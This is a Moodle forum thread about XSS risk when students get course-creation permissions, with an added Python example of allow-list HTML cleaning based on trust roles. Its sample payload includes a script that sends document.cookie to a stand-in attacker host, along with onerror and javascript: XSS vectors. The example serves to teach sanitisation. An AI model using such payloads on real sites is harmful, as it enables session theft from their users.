xss risks - Advice please

Posted by Marie Waterhouse
Number of replies: 8

I would like students to be able to create their own courses under a specific category - a 'My MOODLE' feature.

While looking at the permissions there is a red flag warning regarding XSS risks.

I cannot see how there is a greater XSS risk for a student to manage their own Moodle 'course' than the current system gives them anyway.

For example under Home > My Profile Settings > Edit Profile  they already have the capability to add files (image and media) and HTML? This must pose the same XSS risk?

Any advice much appreciated.

Many thanks

Marie

I have not attached a file - would that not be an XSS risk?

Average rating: -
In reply to Marie Waterhouse

Re: xss risks - Advice please

Posted by Helen Foster
Hi Marie,

If you try adding some HTML containing JavaScript to your profile description you'll find you are prevented from doing so. However, as a teacher, you are allowed to add HTML containing JavaScript in a page resource or an HTML block or anywhere else in your course.

This is because all the places in Moodle where an authenticated user can add HTML are subjected to checks before the HTML is saved. Places in Moodle where a teacher or admin can add HTML are not checked. The same applies to files. As a student in this course, you can attach a file to your forum post, though it will be checked for any potentially malicious code before being displayed.

Please see the documentation XSS trusted users for further details.
Average rating: Useful (2)
In reply to Helen Foster

Re: xss risks - Advice please

Posted by Marie Waterhouse

Thank you very much for your advice Helen.

Please can you expand a bit further for me.

You mention that "places in Moodle where an authenticated user can add HTML are subjected to checks before the HTML is saved" and "As a student in this course, you can attach a file to your forum post, though it will be checked for any potentially malicious code before being displayed"

Who or what does the checking? Does Moodle automatically scan any submission for malicious content, or am I (as a manager) supposed to do this?

I was thinking A) that if Moodle auto-scanned any submissions based on the user role, i.e. 'Student', then I would be covered because they would still have that role? They would be a Student with some of the course creation permissions?

B) I was also thinking that not every bit of malicious code is placed intentionally. What if a 'Manager' attached a corrupted file unintentionally? Would that not get checked?

Best wishes and thank you once again for your help

Marie

In reply to Marie Waterhouse

Re: xss risks - Advice please

Posted by Helen Foster
To answer your further questions (good that you ask about anything you're not sure of), it's Moodle that automatically checks HTML and files.

A) If you give a user extra permissions, for example by assigning them the role of teacher in a course, then in that context (i.e. in the course) any files or HTML that they add will not be checked. In a different course, where the user has the role of student, their files and HTML will be checked.

B) If a user with the role of manager attached a corrupted file unintentionally, it would not be checked. We trust teachers and managers to not add files or HTML containing malicious code. You've probably come across the security overview report (in Site administration > Reports > Security overview) which lists all trusted users on the site to remind admins to double-check that everyone really can be trusted.
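The trust distinction Helen describes in her two replies above (HTML from an author who is not trusted in a context is cleaned against an allow-list before it is saved; HTML from a teacher or manager in the context where they hold that role is stored as entered), as an added illustration. This is not Moodle's own code (Moodle's cleaning is done by the HTML Purifier library); the role names, the allow-list of tags and attributes, and the sample payload are assumptions made for the example.

```python
"""Added illustration of role-dependent HTML cleaning, not Moodle's own code.

TRUSTED_ROLES, ALLOWED and PAYLOAD are assumptions for this example."""

from html import escape
from html.parser import HTMLParser

# Roles trusted to enter raw HTML in a given context (assumption).
TRUSTED_ROLES = {"manager", "editingteacher"}

# Allow-list applied to untrusted authors: tag -> permitted attributes (assumption).
ALLOWED = {
    "p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "ul": set(), "ol": set(), "li": set(), "br": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
}
SAFE_SCHEMES = ("http://", "https://", "mailto:", "/")  # site-relative "/" allowed
VOID = {"br", "img"}


def safe_url(value: str) -> bool:
    """Reject javascript:, data: and any other scheme not on the short allow-list."""
    v = value.strip().lower().replace("\x00", "")
    return v.startswith(SAFE_SCHEMES)


class AllowListCleaner(HTMLParser):
    """Rebuilds the document keeping only allow-listed tags and attributes.

    Everything else (script, style, iframe, on* handlers, style=, javascript:
    URLs) is dropped, and text inside <script>/<style> is dropped with it."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # drops onerror=, onclick=, style=, ...
            if name in ("href", "src") and not safe_url(value):
                continue  # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def clean_html(html: str) -> str:
    """Allow-list cleaning applied to HTML from an untrusted author."""
    parser = AllowListCleaner()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def store_html(html: str, role_in_context: str) -> str:
    """What is saved: verbatim for a trusted role in this context, cleaned otherwise.

    The same user can be trusted in one course and untrusted in another, so the
    decision is made per context, not per account."""
    return html if role_in_context in TRUSTED_ROLES else clean_html(html)


# Constructed sample: a page body carrying three XSS vectors and one harmless link.
PAYLOAD = (
    '<p>Week 1 notes</p>'
    '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(1)">link</a>'
    '<a href="https://example.org/">ok</a>'
)


def demo():
    """Same user, same payload: editing teacher in course A, student in course B."""
    return {
        "course_a_as_editingteacher": store_html(PAYLOAD, "editingteacher"),
        "course_b_as_student": store_html(PAYLOAD, "student"),
    }


if __name__ == "__main__":
    for context, saved in demo().items():
        print(f"{context}: {saved}")
```

Run as a script, the student copy comes back with the `<script>` element, the `onerror` handler and the `javascript:` link all stripped, while the teacher copy is saved exactly as entered. That is the whole of the "XSS risk" flag on a capability: granting it moves a user from the cleaned path to the verbatim path in that context, so the only remaining control is whether the person really is trustworthy, which is what the security overview report is there to remind an admin to check.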
In reply to Helen Foster

Re: xss risks - Advice please

Posted by Marie Waterhouse

Thank you Helen,

For us the problem would not be a lack of trust but more a lack of knowledge. None of us would know if we were uploading bad files.

Many thanks

In reply to Helen Foster

Re: xss risks - Advice please

Posted by Andrew Lyons

Hi,

Just to clarify, if configured, Moodle will pass all uploaded content through a virus scanner. This is not just student content - all attachments are subject to this scan. Most virus checkers also pick out malware.

Andrew

Average rating: Useful (3)
In reply to Andrew Lyons

Re: xss risks - Advice please

Posted by Marie Waterhouse

Thank you Andrew - it is a relief to hear that. I bet you can guess what question is coming next :) You say 'if configured'; how can I configure, or check if it has been? Can you point me in the right direction please?

Best wishes and many thanks

Marie

In reply to Andrew Lyons

Re: xss risks - Advice please

Posted by Marie Waterhouse

Have found:

Home > Site Admin > Security > Anti-Virus

Hope I am on the right track with this.

Regards

Marie